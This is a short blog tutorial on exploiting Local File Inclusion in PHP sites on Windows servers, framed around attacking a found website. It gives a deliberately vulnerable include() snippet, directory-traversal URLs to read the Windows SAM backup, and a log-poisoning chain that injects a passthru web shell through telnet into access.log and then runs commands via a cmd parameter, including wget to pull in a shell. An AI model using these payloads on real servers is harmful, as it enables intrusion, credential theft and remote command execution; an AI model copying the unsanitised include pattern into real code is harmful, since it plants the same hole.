Local File Inclusion LFI On Windows Server

Local File Inclusion LFI on windows server

Local File Inclusion LFI on windows server

In previous post I showed you Local File Inclusion LFI on Linux server but today in this post i will show you how Local File Inclusion LFI on windows server. In this post I will not start with introduction for complete guide please refer my old post.

What is Local File Inclusion LFI vulnerability ?

The local file inclusion LFI is a process of Including Local File available on web server. This vulnerability occur when a user input contains the path of the file that has been included. When this input is not properly sanitized then an attacker give the some default files location and access all these sensitives files.

Here it is the vulnerable code.

<?php
 if (IsSet($_GET['page']))
 include($_GET['page']);
?>

Here we can see that the script doesn’t check for which file to be included and hence, we are free to include any file by changing the ‘page’ GET variable value.

Finding Local file Inclusion LFI vulnerability in website

Now we are going to find an local file inclusion on website so we found a website lets check it if its vulnerable or not.

 www.vulnerablewebsite.com/view.php?page=contact.php

Now lets replace contact.php with ../ so the URL will become

www.vulnerablewebsite.com/view.php?page=../

Now after requesting this page we got an error here big chances to have a Local File Inclusion vulnerability.Let’s go to next step.

Warning: include(profile.php) [function.include]: failed to open stream: No such file or directory in C:\wamp\www\test.php on line 2
Warning: include() [function.include]: Failed opening 'profile.php' for inclusion (include_path='.;C:\php5\pear') in C:\wamp\www\test.php on line 3

In Linux we we include /etc/passwd but in windows server we include /windows/repair/sam so this repair/sam is backup sam file

http://localhost/test.php?page=../../windows/repair/sam

So you know if not found then you will have to move directory up by using ../

So, as you all know in Local file inclusion LFI An attacker can include the sensitives file. so now let us shell the webserver.

For this we will send the some error to the logs of webserver by using a php code.

<?php passthru($_GET['cmd']); ?>

You can also exploit using the system(),exec(),shell_exec() e.t.c commands. The commands are offered by php to execute system level commands.

Here i am going to use telnet to inject malicious code as error in log files.

    telnet localhost 80
    GET /<? passthru($_GET['cmd']); ?> HTTP/1.1

so this script is saved in web server and now we will have to include it.

http://localhost/test.php?page=../logs/access.log&cmd=dir

so now we you can do any thing here after including log files. and you can execute the system level command. like,

http://localhost/test.php?page=../logs/access.log&cmd=dir
http://localhost/test.php?page=../logs/access.log&cmd=mkdir
http://localhost/test.php?page=../logs/access.log&cmd=wget

so now you can wget the shell and download in web.

Hope you enjoyed this session and learned. so thanks for reading guys. keep learning 😉

Author: Ahmed Raza Memon

I am 17 years old Ethical Hacker, Penetration Tester, Web Security Expert and Exploit Writer From the India. My area of expertise includes Ethical Hacking, Vulnerability Assessment, Information Security Audits, Penetration Testing, Exploit Writing, Web Application security, Source Code Reviews, Forensic Investigation and Cyber Law. I have been Acknowledged by many top companies like Microsoft, Apple, SAP, AOL, Sony and many More...

Leave a Reply